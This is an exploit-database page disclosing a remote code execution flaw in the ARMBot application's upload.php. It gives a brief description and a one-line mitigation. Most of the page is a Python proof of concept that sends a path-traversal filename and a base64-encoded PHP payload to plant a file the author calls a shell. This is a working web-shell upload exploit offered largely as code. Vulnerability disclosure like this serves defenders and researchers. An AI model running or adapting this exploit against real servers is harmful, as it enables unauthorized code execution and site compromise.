header-logo
Suggest Exploit
vendor:
ARMBot
by:
Bobr Dobr
9.3
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: ARMBot
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

Remote Code Execution Vulnerability in ARMBot

This exploit allows an attacker to execute arbitrary code on the vulnerable server by exploiting a vulnerability in the ARMBot application. The vulnerability exists due to insufficient input validation in the upload.php script, which allows an attacker to upload a malicious file containing arbitrary code to the server. The attacker can then access the malicious file via a specially crafted URL.

Mitigation:

Input validation should be implemented to prevent malicious files from being uploaded to the server.
Source

Exploit-DB raw data:

import requests

URL = "http://127.0.0.1/ARMBot/upload.php"
r = requests.post(URL,
                  data = {
                     "file":"../public_html/lol/../.s.phtml", # need some trickery for each server ;)
                     "data":"PD9waHAgZWNobyAxOyA/Pg==", # <?php echo 1; ?>
                     "message":"Bobr Dobr"
                  }, proxies={"http":"127.0.0.1:8080","https":"127.0.0.1:8080"})
print(r.status_code)
print("shell should be at http://{}/.s.phtml".format(URL))

Navigation

Suggest Exploit

Services By CQR